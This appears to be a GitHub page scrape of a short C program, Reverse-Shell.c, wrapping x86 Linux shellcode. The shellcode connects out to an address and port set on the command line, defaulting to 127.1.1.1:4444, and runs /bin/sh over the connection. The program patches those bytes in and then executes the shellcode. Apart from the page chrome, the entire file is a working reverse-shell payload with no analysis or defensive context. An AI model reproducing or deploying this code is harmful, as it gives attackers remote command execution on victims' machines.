-
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathReverse-Shell.c
39 lines (30 loc) · 1.25 KB
/
Reverse-Shell.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <stdio.h>
#include <string.h>
#include <netdb.h>
unsigned char shellcode[] = \
"\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80";
main(int argc, char *argv[])
{
if (argc < 3) {
printf("No IP or port provided, 127.1.1.1:4444 (0x7f010101:0x115c) will be used\n");
}
else
{
struct sockaddr_in ipaddr;
inet_aton(argv[1], &ipaddr.sin_addr.s_addr);
int port = atoi(argv[2]);
printf("Connecting to %s (0x%x):%d (0x%x)\n", argv[1], ipaddr.sin_addr.s_addr, port, port);
unsigned int p1 = (port >> 8) & 0xff;
unsigned int p2 = port & 0xff;
shellcode[32] = (unsigned char){p1};
shellcode[33] = (unsigned char){p2};
int i, a;
for (i = 26, a = 0; i <= 29; i++, a+=8)
{
shellcode[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
printf("Byte %d: %.02x\n", i, shellcode[i]);
}
}
int (*ret)() = (int(*)())shellcode;
ret();
}